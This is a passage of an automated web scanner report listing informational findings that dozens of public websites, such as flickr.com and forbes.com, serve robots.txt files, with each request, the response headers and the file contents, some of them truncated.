HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:16:27 GMT
Server: Apache
Last-Modified: Wed, 26 Jan 2011 22:16:57 GMT
ETag: "1a788ed-b3-49ac730ef4840"
Accept-Ranges: bytes
Content-Length: 179
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow:

User-agent: myfamilybot
Disallow:
Crawl-delay: 1

User-agent: msnbot
Disallow:
Crawl-delay: 1

User-agent: Slurp
Disallow:
Crawl-delay: 1


24.314. http://www.findgovernmentjobs.info/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findgovernmentjobs.info
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findgovernmentjobs.info

Response

HTTP/1.1 200 OK
Server: Apache/2.2
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:18:40 GMT
Accept-Ranges: bytes
Connection: close
Set-Cookie: X-Mapping-nbjnphkm=60E5ED604407495DAF13C53E35CDBA72; path=/
Last-Modified: Wed, 31 Mar 2010 16:36:07 GMT
Content-Length: 124

User-agent: *
Disallow: /_mm/
Disallow: /_notes/
Disallow: /_baks/
Disallow: /MMWIP/

User-agent: googlebot
Disallow: *.csi

24.315. http://www.findlocation.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.findlocation.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.findlocation.com

Response

HTTP/1.1 200 OK
Content-Length: 77
Content-Type: text/plain
Last-Modified: Wed, 21 Jul 2010 18:05:21 GMT
Accept-Ranges: bytes
ETag: "b32cc848ff28cb1:49b4"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:54:29 GMT
Connection: close

User-agent: *


Disallow:

sitemap: http://findlocation.com/sitemap.xml

24.316. http://www.finishline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.finishline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.finishline.com

Response

HTTP/1.0 200 OK
Server: Apache
Last-Modified: Tue, 24 Aug 2010 19:45:51 GMT
ETag: "406d-e9-327f9c0"
Accept-Ranges: bytes
Content-Length: 233
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:03:05 GMT
Connection: close

User-agent: *
Disallow: /store/global/css/
Disallow: /store/global/js/
Disallow: /store/global/fragments
Disallow: /store/foresee/
Disallow: /store/catalog/fragments/coupon.jsp

Sitemap: http
...[SNIP]...

24.317. http://www.fixya.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fixya.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fixya.com

Response

HTTP/1.1 200 OK
Content-Length: 5446
Content-Type: text/plain
Last-Modified: Wed, 23 Feb 2011 08:51:04 GMT
Accept-Ranges: bytes
ETag: "0c86cd36d3cb1:cb95"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:23:53 GMT
Connection: close

User-agent: *
Disallow: /404.aspx
Disallow: /a_hp_sl.aspx
Disallow: /addWidget.aspx
Disallow: /AdvExplanation.aspx
Disallow: /askflow/
Disallow: /asknew/
Disallow: /BecomeAnExpert.aspx
Disallo
...[SNIP]...

24.318. http://www.flickr.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flickr.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flickr.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 12:38:18 GMT
P3P: policyref="http://p3p.yahoo.com/w3c/p3p.xml", CP="CAO DSP COR CUR ADM DEV TAI PSA PSD IVAi IVDi CONi TELo OTPi OUR DELi SAMi OTRi UNRi PUBi IND PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA POL HEA PRE GOV"
Set-Cookie: localization=en-us%3Bus%3Bus; expires=Tue, 01-Apr-2014 12:38:18 GMT; path=/; domain=.flickr.com
Set-Cookie: cookie_l10n=deleted; expires=Fri, 02-Apr-2010 12:38:17 GMT; path=/; domain=flickr.com
Set-Cookie: cookie_intl=deleted; expires=Fri, 02-Apr-2010 12:38:17 GMT; path=/; domain=flickr.com
Vary: Accept-Encoding
X-Served-By: www64.flickr.mud.yahoo.com
Cache-Control: private
Content-Length: 143
Connection: close
Content-Type: text/plain; charset=ISO-8859-1

User-agent: *
Disallow: /gp/
Disallow: /report_abuse.gne
Disallow: /abuse
Disallow: /signin
Disallow: /search
Disallow: /groups/10millionphotos

24.319. http://www.flixster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flixster.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:51:52 GMT
Server: Apache
Last-Modified: Thu, 31 Mar 2011 20:44:52 GMT
ETag: "36c"
Accept-Ranges: bytes
Content-Length: 876
Cache-Control: max-age=86400
Expires: Sun, 03 Apr 2011 13:51:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain; charset=UTF-8

User-Agent: *
Disallow: /account
Disallow: /actor/random
Disallow: /admin
Disallow: /address-book
Disallow: /api
Disallow: /bebo
Disallow: /captcha
Disallow: /converse.do
Disallow: /DoNotSend.jsp
Disa
...[SNIP]...

24.320. http://www.flixxy.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.flixxy.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.flixxy.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:34:45 GMT
Server: Apache
Last-Modified: Sun, 20 Mar 2011 01:41:49 GMT
ETag: "18032730-15d-4d855b5d"
Accept-Ranges: bytes
Content-Length: 349
Connection: close
Content-Type: text/plain

...User-agent: *
Disallow: /logs/
Disallow: /olive/
Disallow: /scripts/
Disallow: 300x250.htm
Disallow: 300x250alt.htm
Disallow: 728x90alt.htm
Disallow: 728x90omakasenoborder.htm
Disallow: nos
...[SNIP]...

24.321. http://www.fly.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fly.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fly.com

Response

HTTP/1.0 200 OK
Content-Type: text/plain
Last-Modified: Tue, 29 Mar 2011 18:49:43 GMT
ETag: "c57a3b1142eecb1:0"
Server: Microsoft-IIS/7.5
X-IP: 113
Cache-Control: max-age=31536000
Date: Sat, 02 Apr 2011 13:34:17 GMT
Content-Length: 978
Connection: close

User-agent: *
Disallow: /GenericError.aspx
Disallow: /genericerror.aspx
Disallow: /TrackClick.aspx
Disallow: /trackclick.aspx
Disallow: /TrackClickScreen.aspx
Disallow: /trackclickscreen.aspx
D
...[SNIP]...

24.322. http://www.food.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.food.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.food.com

Response

HTTP/1.0 200 OK
Server: Apache/2.2.3 (Red Hat)
Last-Modified: Wed, 16 Feb 2011 10:40:24 GMT
Content-Length: 374
X-Cnection: close
Content-Type: text/plain
Expires: Sat, 02 Apr 2011 15:42:53 GMT
Date: Sat, 02 Apr 2011 13:42:53 GMT
Connection: close
X-N: S

# robots.txt for http://www.food.com/

User-agent: *
Allow:
Disallow: /recipeprint.do*
#Disallow: /about/tour/
#Disallow: /admin/
#Disallow: /alt/
#Disallow: /mail/
#Disallow: /members/photo
...[SNIP]...

24.323. http://www.foodnetwork.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.foodnetwork.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.foodnetwork.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (Unix)
Last-Modified: Wed, 31 Dec 2008 05:27:54 GMT
Accept-Ranges: bytes
Content-Length: 531
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:24:49 GMT
Connection: close

###############################
#
# foodnetwork.com robots.txt file
#
# addresses all robots by using wild card *

User-agent: *

# list folders robots are not allowed to index

Disallow: /cr/
Dis
...[SNIP]...

24.324. http://www.fool.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fool.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fool.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 22 Jul 2010 18:11:12 GMT
Accept-Ranges: bytes
ETag: "008844c929cb1:0"
Server: Microsoft-IIS/7.0
P3P: policyref="http://www.fool.com/w3c/p3p.xml", CP="IDC DSP COR CUR ADMa DEVa TAIa CONo HISa TELo OUR PHY ONL UNI PUR FIN COM NAV INT DEM CNT STA PRE LOC IND"
Set-Cookie: Sookie=source=&fy=false&ybls=0; domain=.fool.com; path=/
Set-Cookie: Wookie=Ref=http%3a%2f%2fnone%2f; domain=.fool.com; expires=Sun, 03-Apr-2011 13:35:39 GMT; path=/
Set-Cookie: Tookie=T=83364804117048773463401338258482; domain=.fool.com; expires=Tue, 30-Mar-2021 04:00:00 GMT; path=/
X-Powered-By: ASP.NET
Set-Cookie: v1st=CB8D7C0F5B4A83A7; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.fool.com
Date: Sat, 02 Apr 2011 13:35:39 GMT
Connection: close
Content-Length: 1015

# $Revision: 73195 $
# /robots.txt file for http://www.fool.com/ (prod)
# Web Application Stress Tool
User-agent: stress-agent
Disallow: /
# else
User-agent: *
Disallow: /Includes
Disallow: /i
...[SNIP]...

24.325. http://www.footballfanatics.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footballfanatics.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footballfanatics.com

Response

HTTP/1.0 200 OK
Server: Microsoft-IIS/6.0
Content-Type: text/plain
X-Powered-By: ASP.NET
Pragma: no-cache
Cache-Control: private, no-cache, no-store, must-revalidate, proxy-revalidate
Expires: Sat, 02 Apr 2011 13:56:55 GMT
Date: Sat, 02 Apr 2011 13:56:55 GMT
Content-Length: 10762
Connection: close
Cache-Control: private, no-store, no-cache, max-age=0, must-revalidate, proxy-revalidate
Expires: Wed, 11 Aug 2010 21:02:13 GMT

User-agent: *
Allow: /
Allow: /pages/Coupons
Allow: /pages/League_St_Patricks_Day
Allow: /pages/real_fanatics_care
Allow: /pages/Shop_By_Player
Allow: /pages/Sports_Gifts
Allow: /pages/world_so
...[SNIP]...

24.326. http://www.footlocker.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.footlocker.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.footlocker.com

Response

HTTP/1.0 200 OK
Server: Apache
ETag: "6c68b248026c6104e682a5deea0e2727:1283874104"
Last-Modified: Tue, 07 Sep 2010 15:41:44 GMT
Accept-Ranges: bytes
Content-Length: 273
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:56:39 GMT
Connection: close
X-N: S

# Modified 09.07.10
User-agent: *
Disallow: /account/
Disallow: /wishlist/
Disallow: /catalog/shoppingCart/
Disallow: /catalog/emptyCart.cfm
Disallow: /shoppingcart/
Disallow: /checkout/
Disallow: /s7
...[SNIP]...

24.327. http://www.forbes.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.forbes.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.forbes.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:31:03 GMT
Server: Apache/1.3.26
Vary: Accept-Encoding,User-Agent
Last-Modified: Fri, 25 Feb 2011 17:44:32 GMT
ETag: "1c342c2-97-4d67ea80"
Accept-Ranges: bytes
Content-Length: 151
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /static_html/2008/stockcharts/advancedmicrodevices.html
Disallow: /following/
Sitemap: http://www.forbes.com/sitemap_index.xml

24.328. http://www.fotosearch.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.fotosearch.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.fotosearch.com

Response

HTTP/1.1 200 OK
Connection: close
Date: Sat, 02 Apr 2011 13:43:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
ETag:
Content-Length: 7939
Content-Type: text/plain
Set-Cookie: ASPSESSIONIDAQSCSRRR=CDIAKMEDPJAEGPONCEBBLACN; path=/
Cache-control: private

User-agent: psbot
Disallow: /photos-images/
Disallow: /illustration/
Disallow: /clip-art/
Disallow: /video-footage/

User-agent: Gigabot
Disallow: /photos-images/
Disallow: /illustration/
Dis
...[SNIP]...

24.329. http://www.freecreditscore.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freecreditscore.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freecreditscore.com

Response

HTTP/1.1 200 OK
Connection: close
Content-Length: 266
Content-Type: text/plain
Last-Modified: Thu, 12 Aug 2010 19:28:03 GMT
ETag: "8063457b543acb1:1dd3"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 13:42:45 GMT
Set-Cookie: BIGipServerfreecreditscore-web-pool=171117322.19999.0000; path=/
X-PvInfo: [S10203.C6485.A6016.RA0.G0.U641686FB].[OT/plaintext.OG/documents]

User-agent: *
Disallow:/Buttons/*
Disallow:/Images/*
Disallow:/idtheft
Disallow: *.asp$
Disallow: *.asp?
Disallow: *&SiteVersionID*
Disallow: *SiteID*
Disallow: /Order
Disallow: /Login
Disal
...[SNIP]...

24.330. http://www.freedownloadmanager.org/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freedownloadmanager.org
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freedownloadmanager.org

Response

HTTP/1.1 200 OK
Server: nginx/0.7.61
Date: Sat, 02 Apr 2011 14:15:08 GMT
Content-Type: text/plain
Content-Length: 189
Last-Modified: Thu, 17 Feb 2011 11:54:52 GMT
Connection: close
Accept-Ranges: bytes

User-agent: *
Disallow: /vicman.net
Disallow: /vicman
Disallow: /fdm
Disallow: /admin
Disallow: /board/*.*$
Disallow: /downloads/dir
Disallow: /es/downloads/dir
Disallow: /afterinstall.html

24.331. http://www.freefind.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freefind.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freefind.com

Response

HTTP/1.0 200 OK
Server: FreeFind/8.2
ETag: "8YqRUEEZ3ji"
Last-Modified: Wed, 16 Jun 2010 02:43:26 GMT
Accept-Ranges: bytes
Content-Type: text/plain; charset=utf-8
Content-Length: 682
Date: Sat, 02 Apr 2011 13:42:53 GMT

# this entire site is copyright 1998-2006, FreeFind.com
#
# NOTICE: meta-searching this site is prohibited
#
# keep polite spiders from getting in the machinery
# <!-- FreeFind No Map --> <!-- F
...[SNIP]...

24.332. http://www.freelogs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelogs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freelogs.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Content-Type: text/plain; charset=UTF-8
Date: Sat, 02 Apr 2011 14:10:07 GMT
ETag: "701a9-45-49ad95507d500"
Last-Modified: Thu, 27 Jan 2011 19:55:32 GMT
Server: Apache/2.2.16 (Amazon)
Content-Length: 69
Connection: Close

User-agent: *
Disallow: /

User-agent: Mediapartners-Google
Allow: /

24.333. http://www.freelotto.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freelotto.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freelotto.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:40:28 GMT
Server: Apache
Last-Modified: Thu, 08 Oct 2009 21:14:16 GMT
ETag: "d49d-e6-47572f223da00"
Accept-Ranges: bytes
Content-Length: 230
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /offer.asp
Disallow: /register_7082a.asp
Disallow: /register_7082b.asp
Disallow: /register_7083.asp
Disallow: /register_ty.asp
Disallow: /register_wait.asp
Disallow: /skyauctio
...[SNIP]...

24.334. http://www.freeonlinegames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeonlinegames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeonlinegames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:40:17 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding
Content-Length: 31
Connection: close
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /ajax/

24.335. http://www.freerepublic.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freerepublic.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freerepublic.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:07:56 GMT
Server: Apache
Last-Modified: Fri, 21 Aug 2009 02:41:56 GMT
ETag: "3208ff-6b-4719dcfbe4500"
Accept-Ranges: bytes
Content-Length: 107
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /perl/
Disallow: /search/
Disallow: /focus/f-news/search
Disallow: /focus/keywords

24.336. http://www.freeridegames.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.freeridegames.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.freeridegames.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:33:08 GMT
Server: Apache
Last-Modified: Sat, 22 May 2010 06:16:31 GMT
ETag: "10000000003be-3c-48728bfb1e9f2"
Accept-Ranges: bytes
Content-Length: 60
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /do/installEXEtender/
Allow: /


24.337. http://www.friendster.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.friendster.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.friendster.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 14:05:23 GMT
Server: Apache/1.3.39 (Unix)
Hostname: phpqcx10.gbxsc.friendster.com
Last-Modified: Mon, 12 Jun 2006 19:04:27 GMT
ETag: "3a9c58-ac-448dbabb"
Accept-Ranges: bytes
Content-Length: 172
_eep-Alive: timeout=300, max=4998
_onnection: Keep-Alive
Content-Type: text/plain
Via: CN-5000
Connection: close

User-agent: *
disallow: /websearch.php
disallow: /gallery.php
disallow: /usersearch.php
disallow: /group/search.php
disallow: /searchcollege.php
disallow: /searchschool.php

24.338. http://www.frontier.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.frontier.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.frontier.com

Response

HTTP/1.1 200 OK
Set-Cookie: ARPT=RNLPJJS10.160.118.21T0x0000000e_0xc70bab4eCMYJO; expires=Mon, 2-Apr-2012 14:14:35 GMT; path=/
Content-Length: 54
Content-Type: text/plain
Last-Modified: Sun, 25 Apr 2010 04:41:04 GMT
Accept-Ranges: bytes
ETag: "4140a18331e4ca1:523"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
Date: Sat, 02 Apr 2011 14:14:45 GMT
Connection: close

User-agent: *
Disallow: /frontierusage/
Allow: /


24.339. http://www.ft.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ft.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ft.com

Response

HTTP/1.1 200 OK
ETag: "2a5-4c179977"
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP COR LAW CURa ADMa DEVa TAIa PSAa PSDa CONo OUR DELi BUS IND PHY ONL UNI COM NAV INT DEM PRE OTC"
Accept-Ranges: bytes
Content-Length: 677
Date: Sat, 02 Apr 2011 13:39:27 GMT
Connection: close
Last-Modified: Tue, 15 Jun 2010 15:17:11 GMT
Server: Apache/1.3.37
Content-Type: text/plain; charset=utf-8
Keep-Alive: timeout=1, max=120

User-agent: Googlebot-Mobile
Disallow: /search/
Disallow: /ftArticle
Disallow: /FTePaper
Disallow: /epaper
Disallow: /cms/s/8bb7fbd4-e176-11dd-afa0-0000779fd2ac.html
Disallow: /Common/

User-agent: Go
...[SNIP]...

24.340. http://www.ftd.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.ftd.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ftd.com

Response

HTTP/1.1 200 OK
Server: Apache
Set-Cookie: TLTSID=8B7AED345D2F105D0020F14BA4D1F7AE; Path=/; Domain=.ftd.com
Set-Cookie: TLTUID=8B7AED345D2F105D0020F14BA4D1F7AE; Path=/; Domain=.ftd.com; expires=Sat, 02-04-2021 13:46:00 GMT
Vary: Accept-Encoding
X-Accelerator-Vary: Accept-Encoding
Last-Modified: Wed, 19 Jan 2011 03:55:49 GMT
ETag: "ba-4d3660c5"
Content-Length: 186
Content-Type: text/plain
Content-Length: 186
Date: Sat, 02 Apr 2011 13:46:00 GMT
X-Varnish: 1768820919
Age: 0
Via: 1.1 varnish
Connection: close

User-agent: *
Disallow: /1
Disallow: /2
Disallow: /3
Disallow: /4
Disallow: /5
Disallow: /6
Disallow: /7
Disallow: /8
Disallow: /9

Allow: /350/

Sitemap: http://www.ftd.com/sitemap.xml

24.341. http://www.funadvice.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funadvice.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funadvice.com

Response

HTTP/1.1 200 OK
Server: nginx/0.8.52
Date: Sat, 02 Apr 2011 14:02:57 GMT
Content-Type: text/plain
Content-Length: 2348
Last-Modified: Thu, 03 Mar 2011 17:25:41 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

#### Last updated: June 28th, 2010
#### Unauthorized crawling strictly prohibited. We have had bot detection
#### systems running for some time now. We can & will hand you your ass
#### if you crawl o
...[SNIP]...

24.342. http://www.funbrain.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funbrain.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funbrain.com

Response

HTTP/1.1 200 OK
Accept-Ranges: bytes
Cache-Control: max-age=0
Content-Type: text/plain
Date: Sat, 02 Apr 2011 13:27:16 GMT
ETag: "6a-477a2fd7bd100"
Expires: Sat, 02 Apr 2011 13:27:16 GMT
Last-Modified: Thu, 05 Nov 2009 17:23:48 GMT
Server: Apache
Set-Cookie: Apache=10.243.58.175.1301750836385285; path=/; expires=Sun, 01-Apr-12 13:27:16 GMT; domain=.funbrain.com
Vary: Accept-Encoding
Content-Length: 106
Connection: Close

User-agent: Mediapartners-Google*
Disallow:
User-agent: *
Disallow: /cgi-bin
Disallow: /funbrain/cgi-bin


24.343. http://www.funny-games.biz/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funny-games.biz
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funny-games.biz

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sat, 02 Apr 2011 13:58:38 GMT
Content-Type: text/plain
Content-Length: 120
Last-Modified: Tue, 09 Feb 2010 22:47:40 GMT
Connection: close
Expires: Tue, 03 May 2011 13:58:38 GMT
Cache-Control: max-age=2678400
Accept-Ranges: bytes

User-agent: *
Disallow: /public/
Disallow: /user_file/
Disallow: /betatest/

User-agent: Mediapartners-Google*
Disallow:

24.344. http://www.funnyordie.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.funnyordie.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.funnyordie.com

Response

HTTP/1.0 200 OK
Server: nginx
Content-Type: text/plain; charset=utf-8
Status: 200 OK
ETag: "4b4e1bfbc218c20ca8dbb1f93b1f1fe1"
X-Runtime: 5
X-Varnish: 2106476738 2106240822
Content-Length: 477
X-Varnish: 2005621957 2003991129
Served-by: 278029-prodweb2.funnyordie.com/278030-prodweb3.funnyordie.com/278007-prodapp3
Expires: Sat, 02 Apr 2011 13:34:15 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Sat, 02 Apr 2011 13:34:15 GMT
Connection: close

Sitemap: http://www.funnyordie.com/sitemap.xml
User-agent: *
Disallow: /account
Disallow: /account/
Disallow: /signup
Disallow: /login
Disallow: /logout
Disallow: /player/
Disallow: /sessions
Disallow
...[SNIP]...

24.345. http://www.g4tv.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.g4tv.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.g4tv.com

Response

HTTP/1.0 200 OK
Content-Length: 65
Content-Type: text/plain
Content-Location: http://origin.g4tv.com/robots.txt
Last-Modified: Thu, 25 Feb 2010 20:03:07 GMT
Accept-Ranges: bytes
ETag: "804ff48b55b6ca1:d41"
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-Cnection: close
Date: Sat, 02 Apr 2011 13:40:33 GMT
Connection: close

User-Agent: *
Allow: /

Sitemap: http://g4tv.com/sitemap.xml

24.346. http://www.gaiaonline.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gaiaonline.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gaiaonline.com

Response

HTTP/1.0 200 OK
Date: Sat, 02 Apr 2011 13:46:14 GMT
Server: Apache
Last-Modified: Mon, 28 Mar 2011 21:06:58 GMT
ETag: "57e34114-59d-52f98080"
Accept-Ranges: bytes
Content-Length: 1437
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /account
Disallow: /achievements
Disallow: /arena/arts/comics/deletepost
Disallow: /arena/carousel
Disallow: /arena/searches
Disallow: /arena/settabcookie
Disallow: /auth
Disal
...[SNIP]...

24.347. http://www.gamefaqs.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamefaqs.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamefaqs.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:27:36 GMT
Server: Apache
Last-Modified: Wed, 08 Sep 2010 23:08:47 GMT
ETag: "88329-50-48fc798859dc0"
Accept-Ranges: bytes
Content-Length: 80
Keep-Alive: timeout=15, max=949
Connection: Keep-Alive
Content-Type: text/plain; charset=ISO-8859-1

# robots.txt for http://www.gamefaqs.com/

User-agent: *
Disallow: /search/

24.348. http://www.gamerdna.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.gamerdna.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gamerdna.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:55 GMT
Server: Apache/2.2.8 (Unix) mod_ssl/2.2.8 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 PHP/5.2.5
Last-Modified: Sat, 22 Nov 2008 02:54:30 GMT
ETag: "4dc8-282-45c3e47d96580"
Accept-Ranges: bytes
Content-Length: 642
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /announcement.php
Disallow: /calendar.php
Disallow: /cron.php
Disallow: /editpost.php
Disallow: /joinrequests.php
Disallow: /login.php
Disallow: /member.php
Disallow: /misc.php
...[SNIP]...

24.349. http://www.games.com/favicon.ico

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.games.com
Path:   /favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.games.com

Response

HTTP/1.1 200 OK
Date: Sat, 02 Apr 2011 13:31:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/plain;charset=UTF-8
Content-Length: 128
Keep-Alive: timeout=5, max=78
Connection: Keep-Alive

User-Agent: *
Allow: /
Disallow: /_uac/
Disallow: /includes/
Disallow: /modules/
Disallow: /WEB-INF/
Sitemap: /sitemap_index.xml

